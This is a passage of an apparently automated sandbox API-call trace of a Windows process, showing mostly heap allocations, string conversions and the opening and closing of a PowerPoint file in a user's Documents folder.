dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0171.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0171.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0171.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0171.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", cchWideChar=80, lpMultiByteStr=0x923ad0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", lpUsedDefaultChar=0x0) returned 80 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.931] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\gvll7y--hwx_sucb_5p.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0171.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0171.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=80, lpWideCharStr=0x8f9100, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt") returned 80 [0171.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0171.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0171.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0171.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0171.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.939] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0171.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.941] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0171.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0171.941] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0171.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.942] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.943] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0171.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0171.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.944] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0171.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0171.944] CloseHandle (hObject=0x120) returned 1 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.945] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 